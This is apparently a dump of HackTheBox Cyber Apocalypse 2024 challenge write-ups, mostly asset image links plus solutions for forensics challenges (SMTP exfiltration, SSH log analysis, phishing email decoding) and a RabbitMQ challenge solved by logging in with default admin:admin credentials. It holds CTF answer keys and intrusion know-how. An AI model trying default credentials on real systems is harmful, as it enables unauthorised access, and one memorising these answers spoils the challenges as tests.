https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/chainsaw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/chainsaw.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/cyberchef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/cyberchef.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/decrypt-quarantine-file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/decrypt-quarantine-file.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/decrypt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/decrypt.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/firstlook.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/firstlook.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/flag.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/intel-prefetch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/intel-prefetch.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/intel-securitylog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/intel-securitylog.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/log-quarantine.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/log-quarantine.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/pwsh-command1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/pwsh-command1.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/pwsh-command2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/pwsh-command2.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/pwshlog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/pwshlog.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/ransomnote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/ransomnote.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/rev2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/rev2.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/rev3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/rev3.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/rev4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Confinement/assets/rev4.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/cyberchef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/cyberchef.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/flag.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/step_one.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/step_one.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/step_two.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/step_two.png -------------------------------------------------------------------------------- /forensics/[Hard] Game Invitation/assets/step_two_beautified.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Hard] Game Invitation/assets/step_two_beautified.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/cor20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/cor20.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/dnspy_debug_options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/dnspy_debug_options.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/dotpeek.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/dotpeek.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/hexedit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/hexedit.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/ilspy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/ilspy.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/r2r.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/r2r.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/shellcode_range.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/shellcode_range.png -------------------------------------------------------------------------------- /forensics/[Insane] Oblique Final/assets/tabs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Insane] Oblique Final/assets/tabs.png -------------------------------------------------------------------------------- /forensics/[Medium] Data Siege/assets/images/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Data Siege/assets/images/banner.png -------------------------------------------------------------------------------- /forensics/[Medium] Data Siege/assets/images/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Data Siege/assets/images/htb.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/Images/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/Images/banner.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/Images/example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/Images/example.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/Images/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/Images/htb.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/Images/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/Images/shell.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210526796.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210526796.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210539350.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210539350.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210553102.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210553102.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210648805.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210648805.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307210826562.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307210826562.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211242055.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211242055.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211425321.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211425321.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211518078.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211518078.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211611787.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211611787.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/Assets/image-20240307211632474.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Medium] Phreaky/Assets/image-20240307211632474.png -------------------------------------------------------------------------------- /forensics/[Medium] Phreaky/README.md: -------------------------------------------------------------------------------- 1 | ![](Assets/Images/banner.png) 2 | 3 | Phreaky 4 | 5 | 1st March 2024 / Document No. D24.102.XX 6 | 7 | Prepared By: sebh24 8 | 9 | Challenge Author(s): sebh24 10 | 11 | Difficulty: Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | Phreaky is an easy forensics challenge involving detecting SMTP exfiltration and reconstructing the exfiltrated file to retrieve the flag. 18 | 19 | ## Description 20 | 21 | In the shadowed realm where the Phreaks hold sway, A mole lurks within leading them astray. Sending keys to the Talents, so sly and so slick, A network packet capture must reveal the trick. Through data and bytes, the sleuth seeks the sign, Decrypting messages, crossing the line. The traitor unveiled, with nowhere to hide, Betrayal confirmed, they'd no longer abide. 22 | 23 | ## Skills Required 24 | 25 | * Familiarity with network protocol analyzers 26 | 27 | ## Skills Learned 28 | 29 | * Detecting SMTP exfiltration 30 | * Analyzing the SMTP protocol 31 | * Reconstructing files 32 | 33 | # Enumeration 34 | 35 | Enter the artifacts provided along with their file hash here. 36 | 37 | - phreaky.pcap 38 | 39 | ## Analysis 40 | 41 | We are provided with a pcap and a scenario to locate the insider threat within the Phreaks. As per any packet capture we import into the Brim tool initially to locate the conversations and hosts within the packet capture. 42 | 43 | ![image-20240307210526796](./assets/image-20240307210526796.png) 44 | 45 | 46 | 47 | ![image-20240307210539350](./assets/image-20240307210539350.png) 48 | 49 | ![image-20240307210553102](./assets/image-20240307210553102.png) 50 | 51 | We see a large array of traffic, particularly a large amount on port 25 (SMTP). Delving into the File Activity tab we locate numerous zip files, seemingly sent as hash values. 52 | 53 | ![image-20240307210648805](./assets/image-20240307210648805.png) 54 | 55 | Selecting the Wireshark symbol, we are open to locate the specific PCAPs within Wireshark and view the TCP stream. 56 | 57 | ![image-20240307210826562](./assets/image-20240307210826562.png) 58 | 59 | It seems the files themselves are files sent via emails from Caleb within the Phreaks to the resources email within The Talents. This looks like a potential insider threat to me. Interestingly they also have a password associated with the email. 60 | 61 | # Solution 62 | 63 | We next import our PCAP into Network Miner, which extracts the email & zip files into a folder and we can import each of them into an email client. 64 | 65 | ![image-20240307211242055](./assets/image-20240307211242055.png) 66 | 67 | We are able to view each email is associated with a password and the password decompresses the relevant zip file. This indicates Caleb attempted to avoid detection by sending the specific file in zipped chunks. 68 | 69 | ![image-20240307211425321](./assets/image-20240307211425321.png) 70 | 71 | We now have unzipped all the zip files sent via email. 72 | 73 | ![image-20240307211518078](./assets/image-20240307211518078.png) 74 | 75 | The files look to be in 15 parts, which we can join utilizing fjoiner.exe: 76 | 77 | ![image-20240307211611787](./assets/image-20240307211611787.png) 78 | 79 | And the flag is located! 80 | 81 | ![image-20240307211632474](./assets/image-20240307211632474.png) 82 | -------------------------------------------------------------------------------- /forensics/[Very Easy] An unusual sighting/README.md: -------------------------------------------------------------------------------- 1 | ![](assets/banner.png) 2 | 3 | An unusual sighting 4 | 5 | 29th February 2024 / Document No. D24.102.XX 6 | 7 | Prepared By: c4n0pus 8 | 9 | Challenge Author(s): c4n0pus 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | A very easy simple challenge around SSH logs and Bash history 18 | 19 | ## Description 20 | 21 | * As the preparations come to an end, and The Fray draws near each day, our newly established team has started work on refactoring the new CMS application for the competition. However, after some time we noticed that a lot of our work mysteriously has been disappearing! We managed to extract the SSH Logs and the Bash History from our dev server in question. The faction that manages to uncover the perpetrator will have a massive bonus come the competition! Note: Operating Hours of Korp: 0900 - 1900 22 | 23 | ## Skills Required 24 | 25 | * Linux basics 26 | 27 | ## Skills Learned 28 | 29 | * SSH Logs 30 | * Bash History 31 | 32 | ## Q1: "What is the IP Address and Port of the SSH Server (IP:PORT)" 33 | 34 | ## A1: 100.107.36.130:2221 35 | 36 | From the SSH logs, we find any line that refers to an inbound connection: `Connection from 101.111.18.92 port 44711 on 100.107.36.130 port 2221` 37 | 38 | ## Q2: "What time is the first successful Login" 39 | 40 | ## A2: 2024-02-13 11:29:50 41 | 42 | ```txt 43 | [2024-02-13 11:29:50] Accepted password for root from 100.81.51.199 port 63172 ssh2 44 | [2024-02-13 11:29:50] Starting session: shell on pts/2 for root from 100.81.51.199 port 63172 id 0 45 | ``` 46 | 47 | ## Q3: "What is the time of the unusual Login" 48 | 49 | ## A3: 2024-02-19 04:00:14 50 | 51 | We know the Korp's hours of operation are from 0900 - 1900 so an SSH login at 0400 in the morning is suspicious 52 | 53 | ```txt 54 | [2024-02-19 04:00:14] Starting session: shell on pts/2 for root from 2.67.182.119 port 60071 id 0 55 | ``` 56 | 57 | ## Q4: "What is the Fingerprint of the attacker's public key" 58 | 59 | ## A4: OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4 60 | 61 | Taken from the logs: `ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1` 62 | 63 | ## Q5: "What is the first command the attacker executed after logging in" 64 | 65 | ## A5: whoami 66 | 67 | From the bash history file: `[2024-02-19 04:00:18] whoami` 68 | 69 | ## Q6: "What is the final command the attacker executed before logging out" 70 | 71 | ## A6: ./setup 72 | 73 | From the bash history file: `[2024-02-19 04:14:02] ./setup` 74 | -------------------------------------------------------------------------------- /forensics/[Very Easy] An unusual sighting/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] An unusual sighting/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Very Easy] An unusual sighting/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] An unusual sighting/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Very Easy] It Has Begun/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] It Has Begun/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Very Easy] It Has Begun/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] It Has Begun/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Very Easy] It Has Begun/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] It Has Begun/assets/image.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/README.md: -------------------------------------------------------------------------------- 1 | ![](assets/banner.png) 2 | 3 | Urgent 4 | 5 | 29th February 2024 / Document No. D24.102.XX 6 | 7 | Prepared By: thewildspirit 8 | 9 | Challenge Author(s): thewildspirit 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | A very easy forensics challenge that involves extracting and base64-decoding an attachment from an email conversation and URL-decoding the final payload. 18 | 19 | ## Description 20 | 21 | * In the midst of Cybercity's "Fray," a phishing attack targets its factions, sparking chaos. As they decode the email, cyber sleuths race to trace its source, under a tight deadline. Their mission: unmask the attacker and restore order to the city. In the neon-lit streets, the battle for cyber justice unfolds, determining the factions' destiny. 22 | 23 | ## Skills Required 24 | 25 | * Basic decoding knowledge 26 | 27 | ## Skills Learned 28 | 29 | * Basae64 decoding 30 | * URL decoding 31 | * Extracting attachements from eml files 32 | 33 | # Enumeration 34 | 35 | Players are given a file named `Urgent Faction Recruitment Opportunity - Join Forces Against KORP™ Tyranny.eml` which is an email conversation. 36 | 37 | We can use any editor to inspect this file. The content of it is the following. 38 | 39 | ![](assets/conv.png) 40 | 41 | We can easily find some important information, such as: 42 | 43 | * The sender: `anonmember1337@protonmail.com` 44 | * The receiver: `factiongroups@gmail.com` 45 | 46 | Let us find the actual content of the mail. There are two blocks. The first block contains the following headers: 47 | 48 | * Content-Type: text/html;charset=utf-8 49 | * Content-Transfer-Encoding: base64 50 | 51 | So we know that it is probably some kind of text, and since we know the encoding (base64) let us use cyberchef to decode it. 52 | 53 | ![](assets/cyberchef1.png) 54 | 55 | The full conversation can be found here: 56 | 57 | ![](assets/conv_full.png) 58 | 59 | For the next block, we have the following headers: 60 | 61 | * Content-Type: text/html; filename="onlineform.html"; name="onlineform.html" 62 | * Content-Transfer-Encoding: base64 63 | * Content-Disposition: attachment; filename="onlineform.html"; name="onlineform.html" 64 | 65 | So we know that the encoding is base64 and it is an attachment. Again, using cyberchef we will decode the file. 66 | 67 | ![](assets/cyberchef2.png) 68 | 69 | The full html page can be found here: 70 | 71 | ![](assets/html.png) 72 | 73 | # Solution 74 | 75 | Cyberchef can detect the last encoding which is `URL encoding`. 76 | 77 | ![](assets/flag.png) 78 | -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/conv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/conv.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/conv_full.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/conv_full.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/cyberchef1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/cyberchef1.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/cyberchef2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/cyberchef2.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/flag.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Very Easy] Urgent/assets/html.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Very Easy] Urgent/assets/html.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/README.md: -------------------------------------------------------------------------------- 1 | ![img](../../../../../assets/banner.png) 2 | 3 | BunnyPass 5 | 6 | 14$^{st}$ March 2024 / Document No. D24.102.24 7 | 8 | Prepared By: `diogt` 9 | 10 | Challenge Author(s): `makelaris` 11 | 12 | Difficulty: Very Easy 13 | 14 | Classification: Official 15 | 16 | # Synopsis 17 | 18 | - The objective of this challenge is to gain access to a RabbitMQ instance and read the messages sent over it 19 | 20 | ## Description 21 | 22 | - As you discovered in the PDF, the production factory of the game is revealed. This factory manufactures all the hardware devices and custom silicon chips (of common components) that The Fray uses to create sensors, drones, and various other items for the games. Upon arriving at the factory, you scan the networks and come across a RabbitMQ instance. It appears that default credentials will work. 23 | 24 | 25 | ## Skills Required 26 | 27 | - Basic understanding of web interfaces 28 | 29 | ## Skills Learned 30 | 31 | - Navigating a RabbitMQ instance and reading messages 32 | 33 | # Enumeration 34 | 35 | This challenge does not have a downloadable part, we are only given a live instance of RabbitMQ. As per the description of the challenge, the default credentials should be valid for this instance. Given this hint let us try the common `admin:admin` combination. 36 | 37 | ![loginpage](assets/loginpage.png) 38 | 39 | 40 | 41 | After pressing the Login button we successfully connect to the RabbitMQ Instance. 42 | 43 | ![page_1](assets/page_1.png) 44 | 45 | If we search in Google for RabbitMQ we can see that it's a message broker, using the Message Queuing Protocol. 46 | 47 | rabbitmq 48 | 49 | Based on that information we can navigate to the Queues tab and see if we can read any of the messages. 50 | 51 | ![queues2](assets/queues2.png) 52 | 53 | Out of all the Queues, only one appears to have a substantial number of messages, factory_idle with 6 messages ready. Selecting that leads us to another page. 54 | 55 | ![get_msg_1](assets/get_msg_1.png) 56 | 57 | On the bottom of the page, we can see a `Get messages` drop-down menu. 58 | 59 | get_msg_2 60 | 61 | Let's input the number of messages we saw earlier, six, and hit the `Get Message(s` button. Scrolling over the messages we can see that the last message contains the flag. 62 | 63 | get_msg_3 64 | 65 | # Solution 66 | 67 | N/A 68 | 69 | -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/get_msg_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/get_msg_1.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/get_msg_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/get_msg_2.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/get_msg_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/get_msg_3.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/loginpage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/loginpage.png -------------------------------------------------------------------------------- /hw/BunnyPass [Very Easy]/assets/page_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/hw/BunnyPass [Very Easy]/assets/page_1.png -------------------------------------------------------------------------------- 